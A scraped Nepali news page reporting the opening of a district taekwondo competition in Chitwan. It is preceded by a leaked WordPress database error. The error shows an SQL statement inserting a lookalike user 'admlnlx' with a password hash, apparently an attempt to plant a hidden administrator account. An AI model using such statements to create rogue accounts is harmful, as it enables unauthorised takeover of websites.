WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BF8qBp1TRw/MPc0V9/KgUGFawO.u9l/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-06 20:58:49', '', 'admlnlx', 'admlnlx')
चितवन, माघ २१–
लियो क्लब अफ भरतपुरको आयोजनामा प्रथम जिल्ला स्तरीय तेक्वान्दो प्रतियोगिता सुरु भएको छ ।
प्रतियोगिताको उद्घाटन शुक्रबार जिल्ला खेलकुद विकास समिति चितवनका कोषाध्यक्ष केश आचार्य र राष्ट्रिय तेक्वान्दो संघ चितवनका अध्यक्ष विकास श्रेष्ठले संयुक्त रुपमा गरेका थिए ।
शनिबारसम्म हुने प्रतियोगितामा जिल्लाका तीन सय भन्दा बढी खेलाडीहरुको सहभागिता रहेको राष्ट्रिय तेक्वान्दो संघ चितवनका अध्यक्ष विकास श्रेष्ठले जानकारी दिए । माडी क्षेत्रबाट मात्रै प्रतियोगितामा सहभागिता जनाउनका लागि ५० जना भन्दा बढी प्रतिस्पर्धीहरु सहभागी भएको खेलमा शुक्रबार जुनियर तर्फका प्रतियोगिताहरु सम्पन्न गरिएको छ । प्रतियोगिताबाट पहिलो, दोस्रो र तेस्रो हुने खेलाडीलाई माघ २८ र २९ गते चितवनमा हुने राष्ट्रिय तेक्वान्दो प्रतियोगितामा सहभागी गराइने श्रेष्ठले जानकारी दिए । प्रतियोगितामा चितवनका विभिन्न १६ वटा डोजाङको सहभागिता रहेको छ ।